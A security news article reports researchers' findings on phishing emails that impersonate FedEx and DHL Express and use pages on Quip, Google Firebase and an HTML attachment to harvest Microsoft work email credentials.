Microsoft users are getting emails pretending to be from mail couriers FedEx & DHL Express – but that really steal their credentials.
Researchers are warning of recent phishing attacks targeting at least 10,000 Microsoft email users, pretending to be from popular mail couriers – including FedEx & DHL Express.
Both scams have targeted Microsoft email users & aim to swipe their work email account credentials. They also used phishing pages hosted on legitimate domains, including those from Quip & Google Firebase – allowing the emails to slip by security filters built to block known bad links.
“The email titles, sender names & content did enough to mask their true intention and make victims think the emails were really from FedEx & DHL Express respectively,” observed researchers with Armorblox on Tues.
“Emails informing us of FedEx scanned documents or missed DHL deliveries are not out of the ordinary; most users will tend to take quick action on these emails instead of studying them in detail for any inconsistencies.”
Using Quip, Google Firebase
The phishing email spoofing American multinational delivery services company FedEx was entitled, “You have a new FedEx sent to you,” with a date that the email was sent.
This e-mail contained some information about the document to make it seem legitimate – such as its ID, number of pages & type of document – along with a link to view the supposed document. If the recipients clicked on the email, they would be taken to a file hosted on Quip. Quip, which comes in a free version, is tool for Salesforce that offers documents, spreadsheets, slides, & chat services.
“We have observed a continuing trend of malicious actors hosting phishing pages on legitimate services like Google Sites, Box & Quip (in this case),” observed researchers.
“Most of these services have free versions & are easy to use, which make them beneficial for millions of people around the world, but unfortunately also lower the bar for cyber-criminals to launch successful phishing attacks.”
This page contained the FedEx logo & was titled “You have received some incoming FedEx files.”
Microsoft Login Portal
It then included a link for victims to review the supposed document. When the victims clicked on this page, they would finally be taken to a phishing page that resembled the Microsoft login portal, which is hosted on Google Firebase, a platform developed by Google for creating mobile & web applications. Google Firebase has increasingly been utilised by phishing attacks over the past year to sidestep detection.
If a victim enters their credentials on the page, it re-loaded the login portal with an error message asking the victim to enter correct details.
“This might point to some backend validation mechanism in place that checks the veracity of entered details,” stated researchers.
“Alternately, attackers might be looking to harvest as many email addresses & passwords as possible & the error message will keep appearing regardless of the details entered.”
Curious Adobe Login Prompt
A separate campaign impersonated German international courier DHL Express, with emails telling recipients that “Your parcel has arrived,” with their email addresses at the end of the title.
The email informed recipients that a parcel could not be delivered to them due to incorrect delivery details & that the parcel is instead ready for pickup at the post office.
The email prompted recipients to check out attached “shipping documents” if they want to receive their delivery. The attached document was an HTML file (titled “SHIPPING DOC”) that, when opened, previewed a spreadsheet that looked like shipping documents.
Adobe’s PDF Reader
The preview was overlayered with a login request box impersonating Adobe’s PDF reader. Researchers noted that it is possible that attackers were trying to phish for Adobe credentials – but it is more likely that they were trying to get victims’ work email credentials.
“The email field in the login box was pre-filled with the victim’s work email,” explained researchers. “Attackers are banking on victims to think before they act & enter their work email password into this box without paying too much attention to the Adobe branding.”
Similar to the FedEx phishing attack, when victims entered their details on this page, it returned an error message.
With COVID-19 making more people go to online platforms for purchasing goods, groceries & various household accessories – rather than in-person stores – online shipping has reached an all-time high.
Cyber-criminals are plugging into this, as seen in these recent phishing emails – but they have also used many other timely lures, from Covid-19 relief funds, vaccine rollouts & personal protective equipment (PPE) needs.
“During the pandemic, we have all been getting online deliveries, often contactless deliveries & being in mail correspondence with FedEx/DHL is thus a common part of our lives now,” Preet Kumar, Director of Customer Success at Armorblox commented.
“Attackers are banking on victims buying into the legitimacy of this email & taking quick action without thinking about it too much.”